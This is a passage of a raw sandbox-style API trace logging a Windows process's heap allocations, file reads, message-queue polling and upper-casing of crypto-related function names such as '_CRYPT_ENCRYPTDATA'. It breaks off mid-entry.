RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0159.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3de9020 [0159.640] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0159.641] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0159.645] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0159.648] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0xf600, lpOverlapped=0x0) returned 1 [0159.650] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0159.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0159.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0159.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0159.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2f14010 [0159.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de9020 | out: hHeap=0x970000) returned 1 [0159.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0159.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0159.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0159.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0159.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0159.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0159.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0159.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0159.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2e80330 [0159.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0159.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0159.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0159.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0159.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0159.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0159.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2f14010 [0159.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0159.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0159.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0159.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0159.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0159.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0159.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0159.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0159.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0159.805] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0159.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0159.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0159.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2f14010 [0159.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0159.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0159.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0159.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0159.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2eaf938 [0159.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0159.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0159.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0159.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0159.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0159.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0159.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0159.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0159.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0159.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0159.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0159.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0159.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0159.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0159.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0159.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0159.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0159.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0159.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0159.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0159.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0159.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0159.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0159.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0159.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0159.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0159.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0159.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0159.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0159.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0159.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0159.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0159.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0159.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0159.826] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0159.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0159.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0159.826] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0159.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0159.827] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0159.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0159.827] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0159.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0159.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0159.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0159.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0159.827] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0159.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0159.827] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0159.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0159.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0159.828] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0159.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0159.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0159.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0159.828] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0159.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0159.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0159.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0159.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.828] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0159.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0159.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0159.828] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0159.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0159.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0159.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0159.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0159.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0159.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0159.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0159.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0159.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0159.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0159.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0159.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0159.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0159.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 